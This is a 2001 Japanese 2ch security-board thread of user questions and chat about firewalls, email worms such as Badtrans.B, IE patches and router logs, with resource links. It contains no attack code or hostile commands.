○ネットセキュリティー板 質問、雑談スレッド[3]○

勝手ながら新スレ立てました。
スレッドを立てるまでもない質問などはここで。
関連リンクの確認も忘れずにね

関連リンク>>2-10 >>11-20
予備リンク>>1-50

前スレ
http://pc.2ch.net/test/read.cgi/sec/999405173/l50

ネットセキュリティー板 質問、雑談スレッド
http://ton.2ch.net/sec/kako/988/988707245.html
ネットセキュリティー板 質問、雑談スレッド[2]
http://pc.2ch.net/test/read.cgi/sec/999405173/l50

ファイアーウォールソフト 総合スレッド Part2
http://pc.2ch.net/test/read.cgi/sec/991646115/l50
■ 初心者用質問スレッド Part 4 ■
http://pc.2ch.net/test/read.cgi/sec/1006374515/l50
くだらねぇ質問はここに書き込め　Ver212
http://pc.2ch.net/test/read.cgi/sec/1002134745/l50

【各種 Firewall】
ZoneAlarm http://www.zonelabs.com/
Sygate Personal Firewall http://www.sygate.com/
Tiny Personal Firewall http://www.tinysoftware.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer （Tiny Personal Firewall用）
http://server47.hypermart.net/tinyfirewall/
【日本語パッチ 等】
ZoneAlarm　Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm
ZoneAlarm 日本語化パッチ その 1 http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その 2 http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

【セキュリティ チェックサイト
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH　MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

ウィルス情報はこの辺で得られます。
http://www.ipa.go.jp/security/index.html
http://www.symantec.com/region/jp/
http://www.trendmicro.co.jp/
http://www.nai.com/japan/

最強のファイアーウォールソフトって何かな？http://pc.2ch.net/test/read.cgi/sec/988724444/l50
ZoneAlarm　Part3 http://pc.2ch.net/test/read.cgi/sec/1006399748/l50
Tiny Personal Firewall Part2 http://pc.2ch.net/test/read.cgi/sec/1006423282/l50
＿■■BlackICEスレ■■＿ http://pc.2ch.net/test/read.cgi/sec/992171869/l50
SygatePersonalFireWall http://pc.2ch.net/test/read.cgi/sec/993936202/l50

ノートン Internet Security2002ver2 http://pc.2ch.net/test/read.cgi/sec/1004019730/l50
ウイルスバスター2002 http://pc.2ch.net/test/read.cgi/sec/1002745629/l50
マカフィーってだめなの？http://pc.2ch.net/test/read.cgi/sec/994010282/l50

AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

[Windows板] 広告カットとファイヤーウォールソフ ト。
http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板] 自分のパソコンへの不正侵入対策してますか？2
http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者＠2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク＠2ch掲示板 http://pc.2ch.net/hack/
windows＠2ch掲示板 http://pc.2ch.net/win/
ソフトウェア http://pc.2ch.net/software/
ダウンロードソフト(download板) http://pc.2ch.net/download/
パソコン一般＠2ch掲示板 http://pc.2ch.net/pc/

くだらない質問かもしれないですけどこれは何をされているんでしょうか？
Nov 27 14:04:45 ns named[12291]: lame server on 'ns2.cuhk.hk' (in 'hk'?): 128.103.1.1#53
Nov 27 14:28:18 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:28:18 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:28:21 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:28:21 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:29:17 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:29:17 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:29:19 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:29:19 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:29:55 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:29:55 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:29:57 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:29:57 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:31:07 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:31:07 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:31:09 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:31:09 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:31:49 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:31:49 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:31:52 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:31:52 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53

質問です。
メールアドレスから調べて人のIE履歴を閲覧する事って可能なのでしょうか。
もし履歴を見ることが出来るのなら、HDの中も見られてしまうって事なのでしょうか。
よく噂を耳にしますので、とっても気になります。
どなたか教えてください。

現在､winmxにて【Carnivore】傍受systemのソース公開中
ﾕｰｻﾞ @v@nzi57

>>6
http://www.symantec.com/region/jp/securitycheck/index.html

久々にログインしたら、こんなメールが入ってました。
開いても大丈夫なものでしょうか？

差出人 　　　　　　　　　　 件名 日付 サイズ
[email protected] info request 11月 25日 1k
[email protected] DO ME NOW FOR FREE!! 11月 24日 1k
[email protected] Spam: You Need A Second Income?? 11月 18日 4k
[email protected] Do You Like Sex? 11月 10日 1k
jallison6585@arabia.... Spam: Do You Need A Second Income?? 11月 10日 4k

メールを開いただけで、アドレス帳にあるメールアドレスに
スパムを送るウイスルが有ると聞きますが、
トレンドマイクロとかにあるオンラインウイルスチェックで
ウイルスを検知できますか？

あと、OE5を使ってるんですけど、メール送信ログを別に残すってことはできますか？
まさかウイルスも「送信済みアイテム」に残すとは思えないので・・

>8
ありがとうございます。
さっそく購入したいと思います。

あなたのアドレス○○○○○○○・・に、
●●●●●●がシステムを繋げています。
即刻、インターフェイスを使用不可にしますと言う表示が出たのですが
、自分のシステム（ネット）の全体状態と、侵入をしてきた奴の
特定の仕方を教えてください。それと、もう侵入させないやり方も。

これってどのウィルス？

http://news.2ch.net/test/read.cgi/news/1006764991/

>>13
情報少なすぎ！

>>13
Aliz/sircam/badtrans.a/badtrans.b
↑この4つのうちのどれか。

漏れはbadtrans.bに1票。

>>5
http://sdc.sun.co.jp/solaris2-faq/Q5.59.html
http://www.soi.wide.ad.jp/iw97/iw97_tut/slides/12_09/48.html
http://www.kozupon.com/log/log.html

WinMXってセキュリティはどうなんですか？

上にもあるけど大事なので　別枠で

「森の歩きかた」
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク　日本語解説ページあり)
http://eazyfox.tripod.co.jp/

>>13
アリスでした。漏れ購読してたんで・・・（鬱
・・・ノートン先生ありがとう・・・

Kyoto Shimbun 2001.11.28 News
--------------------------------------------------------------------------------

　市販ソフト不正入手 手助け容疑
　専門学校生ら逮捕
　ファイル交換ソフトをパソコンに取り込み、インターネットで市販ソフトを無断で入手できる状態にしたとして、
京都府警ハイテク犯罪対策室と山科署などは28日、著作権法（公衆送信権等）違反の疑いで、さいたま市指扇領別所、
専門学校生今西貴秋容疑者(20)と東京都の大学生(19)を逮捕した。
ファイル交換ソフトを使えば有料ソフトも簡単に手に入るため著作権侵害が国際問題にもなっているが、
利用者を摘発したのは全国で初めて、という。

　調べでは、２人は10月から11月の間、ファイル交換ソフト「ＷｉｎＭＸ」を自分のパソコンに設定し、
米国アドビ・システムズ社の画像編集ソフト「フォトショップ」（販売価格約９万6000円）を、
不特定多数の「ＷｉｎＭＸ」利用者に送信できるようにし、同社の著作権を侵害した疑い。

　府警によると、「ＷｉｎＭＸ」はインターネット上で無料で提供されており、
インターネットを通じて「ＷｉｎＭＸ」の利用者間で互いに所有ファイルを送受信できる。

　府警の調べでは、今西容疑者は音楽ソフトなど約560ファイル、
大学生もゲームソフトなど約2400ファイルを、送信できるようにしていたという。

　コンピュータソフトウェア著作権協会は「米国ではファイル交換ソフトをめぐって裁判になった。
日本でも約100万人がファイル交換ソフトを利用していると推定され、国際問題化している。
今後も警察などと協力し、目を光らせたい」としている。

　２人は、音楽やわいせつ画像、ゲームなどもダウンロードできるようにしており、
府警は大量のソフトを扱っていたことやインターネットでいつでも利用できる状態にしていたことなどから悪質と判断した。

プレビューしたら感染するメールってどうやって削除するの？
削除しようと選択（クリック）しただけでプレビューしやがる　ｗ
SP2入れてない人は、どうしたら安全に削除できるんだろ？
もちろん　メーラーOE

>>22
プレビュー切る。

IE(インターネットエクスプローラ)は危ないと感じた人達へ

ネスケ（ネットスケープコミュニケータ）を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

メール消すよりOEを消す方が先と思われ。

人様に迷惑をかけないよう
念のために接続も切ろう。

とりあえず、表示→レイアウトでプレビュー欄のチェック外すべし。

最強！！木馬殺し！98%で見付かるという謳い文句だ。確かに良かった。
http://www.moosoft.com/

あ、スレッド間違えた。。。鬱だ。

Nimdaスレでは、
どうしましょう→ネット切って首吊れ
てなのがよくあったもんだった。

>30
ぶはは
２ちゃんねらーらしい（w

ﾉｰトン先生ってどのソフト入れると出てくるの?
インターネットセキュリティ２００２じゃ出ないのでしょうか?

>>32
感染してからちょうど1週間後にモニターから出てくるよ。

HTMLメール込みのHAMSTER.DOC.pifってファイル受け取ったやついる？

中身のぞいたらPIFじゃないんだこれが
漏れは逆アセンブラ持ってないのでわからんが
バイナリ見てたらレジストリいじくってるし
149.174.211.*なんていうIPが仕込んであるし
%KeyLogってあやしい変数もある

ウィルスチェッカーでは検知されず

>>34
badtrans.B
惜しいね。。。
せめて1週間前なら大スクープ。。。バイナリ覗いた行為は称えたい。

なんか微笑ましいね

>>35
THX!

>>34
私には、
CARD.DOC.pif
って添付ファイルが付いたメールが届きました。

AAT00004.txtって添付ファイル付きのメールが昨日から来てるんです。
ウィルスなのか、トレンドマイクロで調べても出てこないし・・・。
題名は「Re:」でファイルサイズは４０キロバイトもあるからアヤシイと
思うんですけど・・・・。
調べ方が悪いんですかね？

40.4KBで[email protected]じゃないの？
ノートンだと処理されてtmpファイルになってます。
単品で来たりW32.Badtrans.B@mmと合わせて、昨日位から
来てます。

[email protected]
http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=28116
BadtransBの亜種かな？
検疫のプロパティーで情報を見ると「発生率＝まれ」おあるけど
昨日はBadtransB単品の1/3ぐらい混じってた。

ウイルスの発信元でメルアドが出る場合だと、女の名前がかなり
多い事に気付いた。

fun.MP3.pif
Pics.DOC.scr
ってのが二日連続で送られてきました。
ノートンさんが検疫して隔離してくれたので大丈夫だと思うんですが
気分悪いし、新種らしいので心配です。

この板の詳しい人はどうやって勉強したの？
独学？それとも専門学校とかいった人が多いの？

素朴なぎもーん。

ウイルスとかあんま具体的に教えてくれる学校はないと思う。
個人、企業、学校その他組織とかで、苦労しながら
学んだ人が多いんでねえのかな？
最近だととにかく検索などやって、解説しているサイトさがしたり、
んでわからないことは掲示板とかで聞いたり、また他の人が
書いていることを読んだりすると、結構知識は身につくよ。

>>4
ノートン Internet Securoty2002 Ver.3
http://pc.2ch.net/test/read.cgi/sec/1007009737/l50

ここって　おきにいりに登録してると
以外と便利ですね　他のスレッドに簡単に飛べるし

うちのWin2000が増設したEドライブ（CD−RW）を突然認識しなくなりました。
原因は、昨日ダウンロードしたWin2000の修正プログラムか、
BADTRANS.Bの対策ツール→
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368
だと思うのですが、これってどういうことなのでしょう。

>>43
ウィルスの学校なんてねぇだろ？

>>39
昨日辺りも同じような人いたね。
漏れが見たときはまだ未解決だった。

結局ウィルス対策ソフトはどれがいいの？

あのー、次スレでは>>3にOutpostも入れてほしいのですが。

>>51

あのーwindows98使ってて、ブラウザにネスケ使ってるらしいんですが
（友人が）、この環境で感染するウィルスってあるんでしょうか？
メール閲覧はネスケでやってるらしいです。
感染したかも…（妙なメールがいっぱい来ているらしい）電話が来たんですが
私よく分からないので、宜しければお教え下さい。

>>48
学校のマシンがウィルスだらけのところは
たくさんあるよｗ

>>53

>この環境で感染するウィルスってあるんでしょうか？
・・・そりゃ幾らでも有ります。

>感染したかも…　>>（妙なメールがいっぱい来ているらしい）
妙なメールをイパーイ送信したらしい、なら感染です。
「来てる」という事は感染者から送られまくってるって事でしょうか。
というか、メーラーはアウトルックですか？
ネスケ入れるときはちゃんとIEアンインストールしましたか？

>>53
まずスキャン汁。
http://www.trendmicro.co.jp/hcall/scan.htm

>>54
笑えた。

>>55
メーラーと言いますが、どうも無料のプロバイダのWebメールを
利用しているらしいです。メールは見ている、でも添付ファイルが
あったかどうか分からない…なんですよ。IEに関しては分からない、と。
（自分でセットしてないので分からないって。しっかしりてよ、ですよね）
で、ウィルスの目星だけでもつけたいのですが。なんかトロイの木馬は
来てたそうです（差出人が空欄のやつ）

>>56
こっちもスキャンを勧めたんですけど、上手く行かない（ブチブチきれる）らしくて。
マシン自体かなり前のなので、そのせいかもしれませんが。

>>58
>メーラーと言いますが、どうも無料のプロバイダのWebメールを
>利用しているらしいです。

おまえ・・そんなこともわからんのか。

>しっかしりてよ、ですよね

日本語おかしいし。

>>58
webメーラーならとりあえずは、
直接的な感染はしないと思います。
彼氏/彼女なら、アンチウイルスソフト、ちょっと早いけど、、、
クリスマスプレゼントに買って上げて下さい。
クリスマス当日は、、、、そ、そんな事言わせるなよ。。♥

>>おまえ・・そんなこともわからんのか。

本人でなければ分からんでしょう
友人の話だって始めにかいてるじゃん

>>日本語おかしいし。


ただの打ち間違いじゃん…
あげあしとりしか出来ないんだね

>>61
なんだ本人じゃないのか・・
どうりで"らしい"が多いと思った。

>>60
たぶん大丈夫なんですね。本人は怖くてパソコンの電源入れられないって
言ってましたが、その旨、電話して見ます
ソフトは自分で買ってもらおうっと（私が欲しいくらいだ）

ありがとうございました　>>55,>>56,>>60さま

>>63
webメーラー「だけ」しか使って無いなら、、
という限定付きです。>>60レスは。
んで、クリスマスは、、、、♥
聞かないどいたげる(w

>>1の文章ってコピペなんだね

しかも
１行づつ増えていってる　芸がこまかい

34っす　badtrans.Bの件ではドモ
ウィルスの構造勉強したいんすけど
いいディスアセンブラ知りませんか

新世紀VisualDisAssemblerってやつ
今は配布してないみたいなんで(つーか作者どこいった)

IE5.01SP2のサポート終わっちゃったけど
もう5.5や6に乗り換えた？

ちょい前にウィルスにやられてからノートン入れ始めたんですが、
最近ヤケにNet Nusトロイの木馬デフォルトというアタック受けます。
これは意図的にやられているのでしょうか？
それとも相手が感染していて、無作為にアタックかけているのでしょうか？

>>68
Net Nus？？
し、新種だ！！！
アンチウイルス反応しないかも痴れないぞ。気おつけろ！！
無作為アタックも有るかも痴れん。。。。

すまん、NetBUSだ・・・鬱駄氏脳

>>70
何だ、ナスぢゃ無かったのか。。がっかり。
これから検索して落そうかと思ったのに。。。
ちなみに、感染者がアタックする事は、まづ無い。
というか、踏み台にされてればそれも有りだけど。
むしろ、コントロールする（クライアント）プログラム
持ってる奴が、サーバプログラム仕込まれた（仕込んだ）
相手を探してる可能性の方が高い。厨房が殆ど。無視。
どうしても無視できない貴方は、ネットバス鯖エミュレート
して、接続してきたクライアント落すアプリも有るには有る。
でも、それ自体が偽装されてる鯖プログラムな奴も有るし。
本物でも多分玩具。逆に相手、あをるだけ。

>>66
ttp://www.datarescue.com/idabase/ida.htm
eEyeはココのデスアセンブラ使ってコードレッドのデスアセ
とったらしい。。。GUIみたいね。
でも、シェア。正規版は299US$
フリーのデモ版も有る。回数制限と書き出し出来ない。コン
パイラの対応も限られてるみたい。うーん。デモで10Mだって。。。

ボランドC++suiteでターボデバッガ動かして見る漏れ。

http://www.sophos.co.jp/
この会社って聞いたこと無いけど知ってる？

＞71
ありがとうございます。これで安心して眠れます。

>>73
アンチウイルスの会社。。。見りゃ解るか（ｗ
パッケージのLINUX入れたら、コレ入ってた。

>>67
サポートなんて元からあったのか？

IE6.0・・XP向け
IE5.5SP2・・ME向け
IE5.01SP2・・98向け

って聞いた。

>>73
unix板ではおおむね好評の模様
>>75
検出具合とかどう？鯖サイドで管理できるから気になってるんだけど。

>>73
Sophos は、イギリスなどヨーロッパでシェア一位。新種対応速度が速い。Linux, FreeBSD 向けは、個人利用なら無料。
Linux などから MS-Windows のパーティションをマウントできる環境だと、MS-Windows のウィルスも検知可能。

追記：
IDE ファイルは、その都度更新。Version は、４ヶ月ぐらいで IDE の更新がなくなるため、３ヶ月おきぐらいでプログラム丸ごと再インストールが必須。
面倒だがその分、Sophos Anti-Virus 自体が書き変わっているので、Sophos Anti-Virus 自体がウィルスに冒される危険性が極めて少ない。

ほー。
野豚、流行微、マカヒぐらいしか知らんかったよ。

>>72
おぉ（･∀･）ｲｲ!　はげしくTHX!

>ボランドC++suiteでターボデバッガ動かして見る漏れ。

あ・・・それ会社にあったのに　大掃除で捨ててた
もらっときゃよかった

34のディスアセンブラ補足っす
もっと調べて質問すればよかった　欝

dispe(和モノ)
ttp://www.mirai.ne.jp/~mitsuman/util/dispe/

Win32Program Disassembler(ｺｰﾘｱﾝﾓﾉ)
ttp://www.geocities.com/SiliconValley/Foothills/4078/

とか。

全員集合
ttp://dmoz.org/Computers/Programming/Disassemblers/

恐らくはウィルスの仕業だと思うのですが、ＷｉｎＭｘをいじってたら
インターネットエクスプローラーが壊れてしまいました。
ネットに繋ぐこともできないので駆除ソフトもダウンロードできません。
このような場合どうすればよいのですか？
当方初心者で何もわかりません。

>>83
市販のアンチウイルスソフトを購入してください。
ノートンアンチウイルスを薦めます。

ところで、↑はどこからどうやって書き込んでいるの？

>>84
マン○喫茶・・・たぶん

>>83
ウイルスチェックして不具合がウイルスが原因でないと判明した場合は
WinMXは二度を使わないことを誓い、PC初心者板へ。

今すぐ

PCを

窓から

投げ捨てろ

>>82
サーンクス。
とりあえず、漏れそんなに見つからんかった。
只で色々やって見る。

>>84さん,>>86さん
ありがとうございます。友人のパソコンから書き込んでいます。
しかし、ウィルスだったらどうすれば良いのでしょうか？
本当に初歩の質問で申し訳ないのですが（この質問を最後に初心者板行きます）
あと、ＩＥってどうすれば再インストールできるんですか？
ハードディスクなどにはそれほど影響が出ていないようなので、
無理矢理ネットに繋いで駆除ソフトをダウンロードできないかなー、
などと考えているのですが。

今すぐ

PCから

窓を

投げ捨てろ

>>83
ウイルスでシステムごと逝きそうなんじゃないの？
再インストールとか、そういう次元じゃ・・・。なってちゃって。（ｗ

ＯＳごと、再インストール・駆除ソフトインストール・ＭＸは使わない。
これ、最強。

BADTRANSとかNIMDAとかの名前って誰がつけるの？
既出ならすまそ。

メディアプレイヤーのMS01-056の日本語パッチ出るの遅いなと思ってたら
昔からあるM$のセキュサイトにはもう出てるじゃねーか。
日本語化なんかすぐ出来るだろ、英語版と一緒に出せ。

>>92
最初に発見した人が命名するの。

昨日どこかのスレに書いたはずなんだが見うし
なっちまたい。検索してもでてこねえ。。。

ファイアウォールで思ったんだけど、おみとろんの
COFIにある「Limit Access to Only...」ってやつ
不正アクセスブロックすんの？壁の役割すんの？

質問です。
OS:Win98
ブラウザ:IE5.5にSP2,q240308,Q312461をあててあります。

http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-051
で情報が出ているセキュリティー情報についてですが、
リンク先の
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-051
でIE5.5 SP2用の対処プログラム（q306121.exe）をダウンロードしても、
「この修正プログラムをインストールするには Internet Explorer 5.5 Service Pack 2 が必要です。」
とメッセージが出てインストールできません。
既にSP2を入れてあるのに、何故こんなメッセージが出るのでしょうか？
（コントロールパネルからの「InternetExplorerの修復」は効果ありませんでした。）

すみません、リンク先（後者のURL）は正しくは
http://www.microsoft.com/windows/ie/downloads/critical/q306121/default.asp
でした。

>>96
>q240308,Q312461
それぞれIEのどのバージョンに対する修正で
何を修正したものか見直して見ましょう。

>>98
すみません、意図することがよくわからないのですが…

とりあえず情報を集めてみましたが…
q240308

"Scriptlet.typelib"および"Eyedog" ---q240308
http://www.microsoft.com/japan/support/kb/articles/J051/6/55.asp
http://www.microsoft.com/windows/ie_intl/ja/security/eyedog.htm

Q312461

2001 年 11 月 13 日 Internet Explorer 用の累積的な修正プログラム (MS01-055)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-055

>>99
Q240308はIEのどのバージョンに対する修正ですか？
Q312461に加えてＱ306121の修正は必要ですか？

>>100

q240308については、>>99の2番目のリンクでは
IE4.0と5について修正プログラムがありました。
5.5は5の枠内に入らないのですか？
（「5」だと「5.0」でなく5番台全体を指すのだと理解していました。
理由は>>99の一つ目のリンク先に
>この資料は、Internet Explorer 5 の、これまでに Web サイトでリリースされた
>バージョン (ベータ版を含む) とビルド番号について説明したものです。
と書いてあり、下のリストには5.5も載っているからです。）


q306121についての脆弱性

>ゾーン偽装の脆弱性 : CAN-2001-0664
>HTTP リクエスト エンコードの脆弱性 : CAN-2001-0665
>Telnet 実行の脆弱性の新種 : CAN-2001-0667

のうち、一番上はq312461で修正されてると思いますが、残りの2つは
されてないと思いますが…

ウィルスバスター2002で最新ウィルスデータパターンファイルを更新
の項目がありますが、格納されるフォルダはご存知ありませんか？

>>102
マルチ・ソフトの不正使用者ﾊｹｰﾝ

>>92
すまん、知りたかったのは.Aとか.Bとかまで含めての話。
ここらしい。 http://www.wildlist.org/

鬱...

久しぶりにルーター内のマシンを立ち上げたら繋がらず、DHCPにしてあるIPを見るとなぜかグローバルのIPが入ってた。
IPドメインサーチで調べてみるとapnicとでてきた。
これって何かに感染してるんですか？
怖くて直接つないでDHCP試せない……

ノートン・インターネットセキュリティー２００１体験版（３０日）をインストールして
使っています。
しかし３０日過ぎても使えるんですけどどうなっているのでしょうか？
正確には忘れましたが今日で３１日目だと思うんですけど・・・

>106
プロバイダは？YahooBB？

>>108
CATVです。
件のDHCPですが、DHCPらしく再起動するたびに変わります。
LANケーブルはずしてるのに。

>>109
ドメインサーチでapnicって出た場合、下のところに出る検索窓でapnicを
選択して再検索すればもう少し細かい情報がでるのでは？
apnicはただのnicだし…
APNIC=Asian Pacific Network Information Center

>>110

IANA (NETBLK-LINKLOCAL)
Internet Assigned Numbers Authority
4676 Admiralty Way, Suite 330
Marina del Rey, CA 90292-6695
US

Netname: LINKLOCAL
Netblock: ***.***.0.0 - ***.***.255.255

Coordinator:
Internet Corporation for Assigned Names and Numbers (IANA-ARIN) [email protected]
(310) 823-9358

Domain System inverse mapping provided by:

BLACKHOLE-1.IANA.ORG 192.0.32.18
BLACKHOLE-2.IANA.ORG 192.0.32.19

Record last updated on 12-Oct-2001.
Database last updated on 2-Dec-2001 19:54:36 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.


上の***の範囲内のIPが入ってました。
他のPCが立ち上がっているときは、そちらに「IPがかち合います」って警告もでてきます。
そのときは問題のPCのほうはプロトコルが壊れていますってでてきます。

手元のNISを入れておそるおそるアクセスしてみたら、見慣れたIP範囲になりました。
なぜルーターでは反応しなかったんだ…

しょうがないので明日NISもういちライセンス買って直繋ぎします(´ヘ｀;)ﾊｧ

hotmailのメールがちょくちょく消えます。ここは広告メール置き場にしているのですが、
たまにここに友達からメールがくる時があります。
そして消したはずはないのに、いつのまにかそういう個人的なメールだけ消えてるんです。広告メールはしっかり残ってるのですが
最近多いんですが、誰かに侵入されてるのかな？

っつーか、pwd盗まれただけじゃねぇかそれ？idと同じとかだったんじゃ？
どうでもいいがhotmailって、XPの初期設定でidとらにゃならんから
ますますジャンクメールのターゲットにされてるだろ。
OSたちあげて最初に屑広告読ませるためにバルーン立ち上がるのうざすぎ。

95っす。スレ見つけたので移動してきマス。

今日ルータのログを見て知ったんだが
数分ごとにポート番号を増やしながらスキャンしてくるやつがいる
ログ容量の関係でいつから始まったかわからないんだけど
現在55000番台に突入してる
65536までいけば収まるんだろうけど（また初めからやらねーよな･･･）
危ないポートは塞いでるから心配はなさそうだが
なんかいやーんな感じだ
ちなみに発信元IPは　207.195.141.162
Cm2.comってとこが管理してるIPだった

ウイルスバスターの不正アクセスのログは対して気にしなくて良いと
知っているが、暇だったんでどんな所から来てるんだとドメイン
調べたら化粧品のノエビアと出た。
漏れは男だが、何か利用価値あるのか？（藁

>>117
いずれ嫁さんもらうだろうと思われているかも。
冗談はさておき、男性用もあったり、健康食品その他に
業務拡大している場合が多いからなあ。
ノエビアがどうなんかは知らないよ、実のところ。

ここの板(セキュリティー板)見たとたん、
ノートン君が反応しました。これはなんですか??

http://pc.2ch.net/test/read.cgi/sec/1005050509/168-169

ネット初めて早４年、未だにテレホでワッショイしてますが、
アンチウィルスソフト、持ってません(恥。
で、４日ほど前、ふと雑誌に付いてたＶＢ２００２の体験版を
入れてなんだかんだしてたら、どうやらウィルスには感染
していなかった模様。更に先ほどSymantecでオンライン
チェックをしてもらった所、大丈夫だよだって。
でも、いい加減対策ソフト買おうと思います。来年は。
しかし、よく感染してなかったなぁ・・・。

>>121
ウイルス警備隊Ｖ３
http://www.neic.co.jp/pc/keibi.html

強く勧める。人柱報告求む。

>>121
これ　おすすめ
無料だから　使ってみて嫌だったら　ほかのにすればいいし

H+BEDV Antivir Personal Edition
http://pc.2ch.net/test/read.cgi/sec/1004122172/l50

１２２，１２３さん、どうもです！
いろいろ見てみて、決めたいと思います。
とりあえず今年は体験版にお任せして・・。
しかし、ＶＢ起動時のリソースの空き、２４％て・・。
ＸＰにしたいけど、４年前のポンコツマスィンじゃなぁ。
当時は３０マソしたのに！（苦笑

>>124
その体験版ってアップデート出来るの？
ウィルスは　すぐに新種が出るから
頻繁に更新したほうがいいですよ

ウィルスバスターって重いらしいですね
詳しくは>>2-10の　どこかにある
ウィルスバスターのスレを見てね

>>118
管理者の頭痛の種であるところのﾄﾞｷｭｿ社員の仕業じゃないの？
・調子こいて(愚かにも)社内からポートスキャンしてる
・あれだけ騒ぎになってもまだIE5.xSP2をあててない
等々

>>125さん
さっき試みたら「製品買え！ｺﾞﾙｧ！」と
言われちゃいました。　　　　　ちぇ。

>>127
だったらAntiVir使ってみたら？

基本的に全然　設定変更や操作とかしないし
スレに載ってる参考ページ見て
どうしてもわからないことがあればスレで質問すれば
あと　そのままほったらかしてても　特に問題無いですし

W32/Goner-A来た人いる？

MS01-020の件を利用してるかどうかの情報ｷﾎﾞﾝﾇ

W32/Goner-Aについては
http://www.sophos.com/virusinfo/analyses/w32gonera.html
http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=WORM_GONE.A&VSect=T
まだこの辺くらいしか情報なさげ

rooterでICQ,IRCにつかってるポート，フィルタリングしてしまったほうがよいのかな

初心者なものでよくわかっておらず質問することをお許し下さい。
ZoneAlarmを導入して半月ほどになるのですが
本日になって初めてExplorer.exeが外部に接続しようとするものを
ZoneAlarmが検出しまして、今までには一度もなかったことなので
何か不安になって許可を出しませんでした。
それ以降はExplorer.exeが外部に接続しようとすることはないのですが
なんだったのかわからず不安でたまりません。
Explorer.exeが本来の仕様の範囲内で外部への接続を
試みることはあるのでしょうか？
もしあるのでしたらそれはどういう目的で行なわれるのでしょうか？
それとも何かしらのトロイの侵入を許してしまったのでしょうか？
詳しい方がおられましたらどうか教えて頂けますようお願いします。

環境：Windows98SE(IE6,OE6 主要パッチ当て済)、ZoneAlarm ver.2.6.357
ZoneAlarmのログ：PE,2001/12/05,04:42:35 +9:00 GMT,Windows エクスプローラ,127.0.0.1:1594,N/A

追記ですがAntiVirusの最新定義でのチェック及び
